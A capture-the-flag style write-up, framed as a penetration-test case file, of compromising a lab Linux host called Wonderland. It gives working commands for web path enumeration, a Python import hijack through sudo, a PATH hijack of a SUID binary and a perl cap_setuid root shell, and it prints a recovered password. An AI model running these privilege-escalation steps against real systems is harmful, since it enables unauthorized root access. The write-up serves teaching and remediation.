Rabbit-hole web enum, Python import hijack, and perl capabilities
Intermediate Linux engagement: themed path enumeration exposed SSH credentials; sudo Python imported attacker-writable random.py; SUID teaParty PATH-hijacked date; perl with cap_setuid completed root.
- Case files
- Rabbit-hole web enum, Python import hijack, and perl capabilities
Directory recursion under /r led to an HTML comment with alice’s password. Three privilege boundaries fell to a sudo Python import, a SUID relative system() call, and file capabilities on perl.
nmap and recursive dirsearch under /r recovered alice’s password from an HTML comment at /r/a/b/b/i/t/.
sudo as rabbit imported cwd random.py. SUID teaParty resolved date from PATH; a fake date binary spawned hatter.
getcap listed perl with cap_setuid+ep. POSIX::setuid(0) followed by exec bash completed the engagement.
Engagement summary
Directory recursion under /r led to an HTML comment with alice’s password. Three privilege boundaries fell to a sudo Python import, a SUID relative system() call, and file capabilities on perl.
Against WONDERLAND (10.10.159.138), HTTP presented a Golang site inviting operators to “follow the white rabbit.” Nested directory brute force under /r/a/b/b/i/t/ exposed an HTML comment with alice’s SSH password. The user artifact lived under /root while root’s artifact sat in alice’s home — inverted placement that did not change the privilege model. sudo -l allowed rabbit to run a Python script that imported random from cwd; planting random.py yielded a rabbit shell. SUID teaParty invoked date without a full path; PATH hijack landed as hatter. getcap showed perl with cap_setuid+ep, which setuid(0) and exec’d bash as root.
Business impact
Credentials in client-side comments are still credentials. Sudo that runs interpreters against attacker-writable import paths, SUID helpers that shell out to PATH-resolved binaries, and setuid capabilities on scripting languages are each a direct path to root. Remediate by removing secrets from static assets, locking sudo Python to trusted modules, rewriting SUID helpers with absolute paths, and stripping unnecessary capabilities.
Path enumeration and SSH foothold
nmap and recursive dirsearch under /r recovered alice’s password from an HTML comment at /r/a/b/b/i/t/.
OPERATOR · NMAP
savvy@lab:~$ nmap 10.10.159.138 -sV -sC
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu
80/tcp open http Golang net/http server
OPERATOR · DIRSEARCH
savvy@lab:~$ dirsearch -u http://10.10.159.138
/img /r
savvy@lab:~$ dirsearch -u http://10.10.159.138/r/a/b
# theme path → /r/a/b/b/i/t/ ; view-source holds alice credentials
savvy@lab:~$ ssh alice@10.10.159.138
savvy@lab:~$
Python import and SUID PATH pivots
sudo as rabbit imported cwd random.py. SUID teaParty resolved date from PATH; a fake date binary spawned hatter.
OPERATOR · PYTHON HIJACK
savvy@lab:~$ sudo -l
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
savvy@lab:~$ printf 'import os\nos.system("/bin/bash")\n' > /home/alice/random.py
savvy@lab:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
savvy@lab:/home/alice$
OPERATOR · TEAPARTY
savvy@lab:~$ ls -la /home/rabbit/teaParty
-rwsr-sr-x ... teaParty
savvy@lab:~$ ltrace ./teaParty
system("/bin/echo -n 'Probably by ' && date --date='next hour' -R")
savvy@lab:~$ printf '#!/bin/bash\n/bin/bash\n' > /home/rabbit/date && chmod +x /home/rabbit/date
savvy@lab:~$ export PATH=/home/rabbit:$PATH && ./teaParty
savvy@lab:/home/rabbit$
savvy@lab:~$ cat /home/hatter/password.txt
WhyIsARavenLikeAWritingDesk?
perl cap_setuid to root
getcap listed perl with cap_setuid+ep. POSIX::setuid(0) followed by exec bash completed the engagement.
OPERATOR · CAPABILITIES
savvy@lab:~$ getcap -r / 2>/dev/null
/usr/bin/perl = cap_setuid+ep
savvy@lab:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
root@lab:~# id
uid=0(root) gid=1003(hatter) groups=1003(hatter)
Remediation
Keep secrets out of HTML. Prefer absolute imports and PYTHONSAFEPATH for sudo’d scripts. Compile SUID helpers with absolute binary paths. Audit getcap regularly and remove cap_setuid from interpreters.